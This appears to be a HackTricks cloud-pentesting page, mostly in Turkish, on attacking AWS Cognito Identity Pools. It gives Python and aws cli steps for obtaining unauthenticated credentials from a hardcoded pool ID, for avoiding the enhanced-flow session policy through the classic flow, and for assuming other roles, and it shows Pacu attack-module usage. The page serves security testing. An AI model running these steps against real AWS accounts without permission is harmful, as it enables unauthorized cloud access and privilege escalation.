Cognito Identity Pools

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Temel Bilgiler

Kimlik havuzları, kullanıcılarınızın geçici kimlik bilgileri edinmesini sağlayarak kritik bir rol oynar. Bu kimlik bilgileri, Amazon S3 ve DynamoDB dahil olmak üzere çeşitli AWS hizmetlerine erişim için gereklidir. Kimlik havuzlarının dikkat çekici bir özelliği, hem anonim misafir kullanıcıları hem de kullanıcı kimlik doğrulaması için bir dizi kimlik sağlayıcısını desteklemeleridir. Desteklenen kimlik sağlayıcıları şunlardır:

Amazon Cognito kullanıcı havuzları
Facebook, Google, Amazon ile Giriş ve Apple ile Giriş gibi sosyal oturum açma seçenekleri
OpenID Connect (OIDC) ile uyumlu sağlayıcılar
SAML (Güvenlik İddiası İşaretleme Dili) kimlik sağlayıcıları
Geliştirici kimlik doğrulamalı kimlikler

# Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows:
import boto3

# Initialize the Amazon Cognito Identity client
client = boto3.client('cognito-identity')

# Assume you have already created an identity pool and obtained the IdentityPoolId
identity_pool_id = 'your-identity-pool-id'

# Add an identity provider to the identity pool
response = client.set_identity_pool_roles(
IdentityPoolId=identity_pool_id,
Roles={
'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
}
)

# Print the response from AWS
print(response)

Cognito Sync

Kimlik Havuzu oturumları oluşturmak için önce bir Kimlik ID'si oluşturmanız gerekir. Bu Kimlik ID'si, o kullanıcının oturumunun tanımlayıcısıdır. Bu tanımlayıcılar, 1MB'a kadar anahtar-değer çiftleri depolayabilen 20'ye kadar veri kümesine sahip olabilir.

Bu, bir kullanıcının bilgilerini saklamak için faydalıdır (her zaman aynı Kimlik ID'sini kullanacak olan).

Ayrıca, cognito-sync hizmeti, bu bilgileri yönetmek ve senkronize etmek için hizmettir (veri kümelerinde, akışlarda ve SNS mesajlarında bilgi gönderme...).

Pentesting için Araçlar

Pacu, AWS istismar çerçevesi, artık bir hesapta tüm Cognito varlıklarının sayımını otomatikleştiren ve zayıf yapılandırmaları, erişim kontrolü için kullanılan kullanıcı niteliklerini vb. işaret eden "cognito__enum" ve "cognito__attack" modüllerini içermektedir. Ayrıca, kullanıcı oluşturmayı (MFA desteği dahil) ve değiştirilebilir özel niteliklere, kullanılabilir kimlik havuzu kimlik bilgilerine, id token'larındaki üstlenilebilir rollere dayalı ayrıcalık yükseltmeyi otomatikleştirir.

Modüllerin işlevlerinin açıklaması için blog yazısının 2. kısmına bakın. Kurulum talimatları için ana Pacu sayfasına bakın.

Kullanım

Belirli bir kimlik havuzu ve kullanıcı havuzu istemcisi karşısında kullanıcı oluşturma ve tüm ayrıcalık yükseltme vektörlerini denemek için örnek cognito__attack kullanımı:

Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX

Örnek cognito__enum kullanımı, mevcut AWS hesabında görünen tüm kullanıcı havuzlarını, kullanıcı havuzu istemcilerini, kimlik havuzlarını, kullanıcıları vb. toplamak için:

Pacu (new:test) > run cognito__enum

Cognito Scanner is a CLI aracı python'da, istenmeyen hesap oluşturma ve kimlik havuzu yükseltmesi dahil olmak üzere Cognito üzerinde farklı saldırıları uygular.

Kurulum

$ pip install cognito-scanner

Kullanım

$ cognito-scanner --help

Daha fazla bilgi için https://github.com/padok-team/cognito-scanner adresini kontrol edin

IAM Rollere Erişim

Kimlik Doğrulaması Olmadan

Bir saldırganın, kimlik doğrulaması yapılmamış bir kullanıcı olarak bir Cognito uygulamasında AWS kimlik bilgilerini almak için bilmesi gereken tek şey Identity Pool ID'dir ve bu ID, web/mobil uygulamada sabit kodlanmış olmalıdır. Bir ID şu şekilde görünür: eu-west-1:098e5341-8364-038d-16de-1865e435da3b (bruteforce edilemez).

Oluşturulan IAM Cognito kimlik doğrulaması yapılmamış rolü varsayılan olarak Cognito_<Identity Pool name>Unauth_Role olarak adlandırılır.

Eğer sabit kodlanmış bir Identity Pools ID bulursanız ve bu kimlik doğrulaması yapılmamış kullanıcılara izin veriyorsa, AWS kimlik bilgilerini şu şekilde alabilirsiniz:

import requests

region = "us-east-1"
id_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b'
url = f'https://cognito-identity.{region}.amazonaws.com/'
headers = {"X-Amz-Target": "AWSCognitoIdentityService.GetId", "Content-Type": "application/x-amz-json-1.1"}
params = {'IdentityPoolId': id_pool_id}

r = requests.post(url, json=params, headers=headers)
json_resp = r.json()

if not "IdentityId" in json_resp:
print(f"Not valid id: {id_pool_id}")
exit

IdentityId = r.json()["IdentityId"]

params = {'IdentityId': IdentityId}

headers["X-Amz-Target"] = "AWSCognitoIdentityService.GetCredentialsForIdentity"
r = requests.post(url, json=params, headers=headers)

print(r.json())

Ya da aşağıdaki aws cli komutlarını kullanabilirsiniz:

aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
aws cognito-identity get-credentials-for-identity --identity-id <identity_id> --no-sign

Not edin ki, varsayılan olarak kimlik doğrulaması yapılmamış bir cognito kullanıcısının hiçbir izni OLAMAZ, hatta bir politika aracılığıyla atanmış olsa bile. Aşağıdaki bölümü kontrol edin.

Gelişmiş vs Temel Kimlik Doğrulama Akışı

Önceki bölüm varsayılan gelişmiş kimlik doğrulama akışını takip etti. Bu akış, oluşturulan IAM rol oturumu için kısıtlayıcı oturum politikası belirler. Bu politika, oturumun yalnızca bu listedeki hizmetleri kullanmasına izin verecektir (rolün diğer hizmetlere erişimi olsa bile).

Ancak, bunu aşmanın bir yolu vardır; eğer Kimlik havuzu "Temel (Klasik) Akış" etkinse, kullanıcı o akışı kullanarak bir oturum alabilecektir ve bu kısıtlayıcı oturum politikası olmayacaktır.

# Get auth ID
aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign

# Get login token
aws cognito-identity get-open-id-token --identity-id <identity_id> --no-sign

# Use login token to get IAM session creds
## If you don't know the role_arn use the previous enhanced flow to get it
aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::<acc_id>:role/<role_name>" --role-session-name sessionname --web-identity-token <token> --no-sign

Eğer bu hata ile karşılaşırsanız, bunun nedeni temel akışın etkin olmamasıdır (varsayılan)

GetOpenIdToken işlemi çağrılırken bir hata oluştu (InvalidParameterException): Temel (klasik) akış etkin değil, lütfen geliştirilmiş akışı kullanın.

Bir dizi IAM kimlik bilgisine sahip olduğunuzda, hangi erişime sahip olduğunuzu kontrol edin ve yetkileri yükseltmeye çalışın.

Kimlik Doğrulanmış

Kimlik doğrulanmış kullanıcıların muhtemelen farklı izinler alacağını unutmayın, bu nedenle eğer uygulama içinde kaydolabiliyorsanız, bunu yapmayı deneyin ve yeni kimlik bilgilerini alın.

Kimlik Havuzuna erişen kimlik doğrulanmış kullanıcılar için de roller mevcut olabilir.

Bunun için kimlik sağlayıcısına erişiminiz olması gerekebilir. Eğer bu bir Cognito Kullanıcı Havuzu ise, belki varsayılan davranışı kötüye kullanarak kendiniz yeni bir kullanıcı oluşturabilirsiniz.

IAM Cognito kimlik doğrulama rolü varsayılan olarak Cognito_<Kimlik Havuzu adı>Auth_Role olarak adlandırılır.

Her neyse, aşağıdaki örnek, bir Cognito Kullanıcı Havuzu içinde kimlik doğrulaması yapmış olduğunuzu varsayıyor (başka türde kimlik sağlayıcılarının da yapılandırılabileceğini unutmayın).

aws cognito-identity get-id \
--identity-pool-id <identity_pool_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

# Önceki komut yanıtından identity_id'yi alın
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>


# IdToken içinde, bir kullanıcının Kullanıcı Havuzu Grupları nedeniyle erişebileceği rolleri bulabilirsiniz
# Belirli bir role erişim almak için --custom-role-arn kullanın
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
    --custom-role-arn <role_arn> \
    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

Kullanıcının giriş yaptığı kimlik sağlayıcısına veya sadece kullanıcıya (iddialar kullanarak) bağlı olarak farklı IAM rollerini yapılandırmak mümkündür. Bu nedenle, aynı veya farklı sağlayıcılar aracılığıyla farklı kullanıcılara erişiminiz varsa, giriş yapmanın ve hepsinin IAM rollerine erişmenin faydalı olabileceğini unutmayın.

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousAWS - Cognito Enum NextCognito User Pools

Last updated 3 days ago